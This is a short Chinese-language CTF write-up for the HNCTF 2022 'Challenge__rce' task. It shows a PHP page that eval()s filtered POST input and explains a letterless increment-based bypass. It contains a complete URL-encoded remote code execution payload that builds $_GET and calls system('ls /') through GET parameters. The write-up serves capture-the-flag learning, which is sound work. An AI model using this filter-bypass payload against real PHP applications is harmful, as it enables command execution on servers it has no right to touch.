[HNCTF 2022 Week1]Challenge__rce

[HNCTF 2022 Week1]Challenge__rce

打开界面空白，查看该界面源码，其中的提示告诉我们可以通过 /?hint= 来传参

我们随便赋一个值，跳出源码

<?php
error_reporting(0);
if (isset($_GET['hint'])) {
    highlight_file(__FILE__);
}
if (isset($_POST['rce'])) {
    $rce = $_POST['rce'];
    if (strlen($rce) <= 120) {
        if (is_string($rce)) {
            if (!preg_match("/[!@#%^&*:'\-<?>\"\/|`a-zA-Z~\\\\]/", $rce)) {
                eval($rce);
            } else {
                echo("Are you hack me?");
            }
        } else {
            echo "I want string!";
        }
    } else {
        echo "too long!";
    }
} 

无参RCE,主要方法有三种，取反，自增，异或

这里因为~和^都被过滤了，所以考虑自增。

本题，由于长度限制，所以可以构造参数，再上传参数减少长度。

payload:

post:
rce=%24_%3D%5B%5D._%3B%24__%3D%24_%5B1%5D%3B%24_%3D%24_%5B0%5D%3B%24_%2B%2B%3B%24_1%3D%2B%2B%24_%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D%24_1.%2B%2B%24_.%24__%3B%24_%3D_.%24_(71).%24_(69).%24_(84)%3B%24%24_%5B1%5D(%24%24_%5B2%5D)%3B%20
GET:
1=system&&2=ls /